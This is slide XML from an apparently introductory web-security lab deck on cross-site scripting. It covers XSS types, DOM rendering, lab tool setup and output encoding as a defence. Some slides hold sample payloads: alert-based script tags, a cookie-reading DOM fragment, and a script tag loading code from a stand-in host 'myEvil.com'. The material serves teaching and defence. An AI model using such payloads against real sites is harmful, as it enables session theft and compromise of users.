          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8003"/>
              <a:gd name="adj2" fmla="val 94966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45626" y="1869845"/>
            <a:ext cx="253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Ex: Web forum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579" y="3114414"/>
            <a:ext cx="897082" cy="939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4389" y="1535463"/>
            <a:ext cx="5781011" cy="4162718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rounded Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="519112" y="4584700"/>
            <a:ext cx="3298839" cy="1207930"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35442"/>
              <a:gd name="adj2" fmla="val -77314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0851" y="4722887"/>
            <a:ext cx="3096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 just want to buy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Web Application Hacker’s Handbook</a:t>
            </a:r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14/22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293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ular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="1562701"/>
            <a:ext cx="2594276" cy="764345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24611"/>
              <a:gd name="adj2" fmla="val 77357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56093" y="1607918"/>
            <a:ext cx="2535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Ex: Some EC site with comment functionality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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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76601" y="3093134"/>
            <a:ext cx="2819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Show me the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dicussion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Left Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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41445" y="3731049"/>
            <a:ext cx="3540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 &lt;script&gt;alert(“XSS”)&lt;/script&gt;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Down Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7727949" y="3714750"/>
            <a:ext cx="609600" cy="1739899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79558" y="4245235"/>
            <a:ext cx="64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6916440" y="1756146"/>
            <a:ext cx="1926236" cy="570899"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -8003"/>
              <a:gd name="adj2" fmla="val 94966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45626" y="1869845"/>
            <a:ext cx="253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Ex: Web forum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579" y="3114414"/>
            <a:ext cx="897082" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 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7520" y="1701705"/>
            <a:ext cx="6454279" cy="4090925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 bwMode="auto">
          <a:xfrm>
            <a:off x="5335920" y="3027316"/>
            <a:ext cx="810080" cy="162016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="53800">
                <a:srgbClr val="A30000"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="820000"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BF0000"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="10800000" scaled="1"/>
            <a:tileRect/>
          </a:gra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519112" y="4584700"/>
            <a:ext cx="2266747" cy="1207930"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35442"/>
              <a:gd name="adj2" fmla="val -77314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0852" y="4722887"/>
            <a:ext cx="2125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Is this even @maz0n??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15/22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3593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Preparation Check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Lab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> address (in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>BoxNote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)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Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Chrome is too secure for this purpose…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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Manager+ (a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0"/>
              <a:t>Firefox a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>dd-on)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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Client (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>PuTTY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> or Mac Terminal)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Burp Suite Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>And the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> of your pal!</a:t>
            </a:r>
          </a:p>
          <a:p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8929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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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Rounded Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1161590" y="2948838"/>
            <a:ext cx="5455110" cy="1858573"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -40310"/>
              <a:gd name="adj2" fmla="val -90987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05113" y="3165790"/>
            <a:ext cx="53115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DOM (Document Object Model) represents HTML/XML documents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in a tree structure (DOM tree),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that browsers use for rendering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200" y="3277800"/>
            <a:ext cx="760800" cy="760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16/22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1426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0" y="1765301"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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2499" y="2667000"/>
            <a:ext cx="1460501" cy="1460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0300" y="4807411"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7893050" y="4217000"/>
            <a:ext cx="228600" cy="507400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6490132" y="713143"/>
            <a:ext cx="2312556" cy="1674000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4269"/>
              <a:gd name="adj2" fmla="val 68405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0118" y="849717"/>
            <a:ext cx="213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page.html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&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;head&gt;…&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;…&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;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200" y="3277800"/>
            <a:ext cx="760800" cy="760800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 bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="2971800"/>
            <a:ext cx="4882890" cy="573558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33800" y="3074668"/>
            <a:ext cx="2667000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1. Show me that page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Left Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2344997" y="3614211"/>
            <a:ext cx="4882890" cy="602789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55254" y="374661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 HTML responses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17/22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3171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0" y="1752600"/>
            <a:ext cx="3873499" cy="387349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3 types of XSS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1621" y="928515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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based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1099" y="2730499"/>
            <a:ext cx="1460501" cy="1460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0300" y="4883611"/>
            <a:ext cx="1054100" cy="10599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589" y="3161672"/>
            <a:ext cx="895811" cy="895811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Up-Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="4267200"/>
            <a:ext cx="228600" cy="507400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200" y="3277800"/>
            <a:ext cx="760800" cy="760800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangular Callout 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4152900" y="740262"/>
            <a:ext cx="4495800" cy="1448602"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105841"/>
              <a:gd name="adj2" fmla="val 101142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32886" y="711536"/>
            <a:ext cx="42015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3. HTML response received from server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;head&gt;…&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;…&lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2942682" y="2419848"/>
            <a:ext cx="5964600" cy="1618752"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -71089"/>
              <a:gd name="adj2" fmla="val 565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Alternate Process 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2595700"/>
            <a:ext cx="1066800" cy="504254"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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68289" y="2663161"/>
            <a:ext cx="713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html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Alternate Process 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6972300" y="3305288"/>
            <a:ext cx="1066800" cy="504254"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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4190999" y="3167415"/>
            <a:ext cx="3360419" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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Alternate Process 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3695700" y="3305288"/>
            <a:ext cx="1066800" cy="504254"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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05700" y="3220576"/>
            <a:ext cx="45719" cy="116996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="AF4DF8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5879263" y="3063927"/>
            <a:ext cx="45719" cy="116996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="AF4DF8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4191000" y="3220576"/>
            <a:ext cx="45719" cy="116996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="AF4DF8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86200" y="3384644"/>
            <a:ext cx="76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head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208518" y="337297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body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3429000" y="3867176"/>
            <a:ext cx="1524000" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4199053" y="3695947"/>
            <a:ext cx="45719" cy="210429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="AF4DF8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Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6730759" y="3871394"/>
            <a:ext cx="1524000" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8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" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7500812" y="3700165"/>
            <a:ext cx="45719" cy="210429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AF4DF8"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="AF4DF8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046412" y="2546444"/>
            <a:ext cx="2038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4. Browser parse into DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangular Callout 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="4219751"/>
            <a:ext cx="5363861" cy="1571449"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38886"/>
              <a:gd name="adj2" fmla="val -91107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2087" y="4579921"/>
            <a:ext cx="4689930" cy="105887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143000" y="4210589"/>
            <a:ext cx="216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5. Browser renders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18/22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30019" y="5943600"/>
            <a:ext cx="85091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http://www.some.site/page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" dirty="0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2214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3 types of XSS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Reflected</a:t>
            </a:r>
          </a:p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Stored</a:t>
            </a:r>
          </a:p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DOM-based</a:t>
            </a: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3843882" y="1271052"/>
            <a:ext cx="4703400" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66044"/>
              <a:gd name="adj2" fmla="val -6289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14800" y="1473726"/>
            <a:ext cx="43158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DOM is in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user’s browser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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM-based XSS happens on the user’s side meaning the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>problem is on the Client Side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This is contrasted with both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected and Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because both exist due to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Side issues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39" y="2662881"/>
            <a:ext cx="2761361" cy="31283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19/22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204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What you can do with XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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733800" y="1017348"/>
            <a:ext cx="5105400" cy="3935652"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58333"/>
              <a:gd name="adj2" fmla="val 22838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66788" y="1308396"/>
            <a:ext cx="49724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There could be a lot of different payloads for XSS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rPr>
              <a:t>Steal session cookies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rPr>
              <a:t>Deface websites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rPr>
              <a:t>Keylogging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rPr>
              <a:t>Webcam snapshot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rPr>
              <a:t>Download and execute malware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ja-JP" sz="2400" dirty="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rPr>
              <a:t>Vibrate your Android phone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" y="2895599"/>
            <a:ext cx="3276600" cy="3276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20/22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7789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What you can do with XSS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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154039" y="3371680"/>
            <a:ext cx="2761361" cy="3128319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 bwMode="auto">
          <a:xfrm>
            <a:off x="321900" y="1524000"/>
            <a:ext cx="7412401" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33671"/>
              <a:gd name="adj2" fmla="val 84791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9050" y="1751737"/>
            <a:ext cx="76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When XSS allow you to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>point to external JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, you can do whatever you want. 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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://myEvil.com/myEvil.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;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21/22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7347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05200"/>
            <a:ext cx="3911600" cy="2667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Question</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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3263900" y="1344244"/>
            <a:ext cx="5105400" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61932"/>
              <a:gd name="adj2" fmla="val 57310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16300" y="1592460"/>
            <a:ext cx="4953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How should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>we defend</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>over from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the client side?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&lt;script&gt;alert(“XSS”)&lt;/script&gt;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09/22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6031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General XSS Defenses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b="1" dirty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Encoding (Sanitization)</a:t>
            </a:r>
          </a:p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&lt;script&gt;alert(“XSS”)&lt;/script&gt;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Characters like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”, 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single/double quotes are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>reserved characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty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in HTML, browsers will interpret it as HTML tags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To avoid browsers from interpreting it like this, special characters need to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>encoded as Character Entities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71800" y="5800188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Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.w3schools.com/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>html_entities.asp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10/22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0400"/>
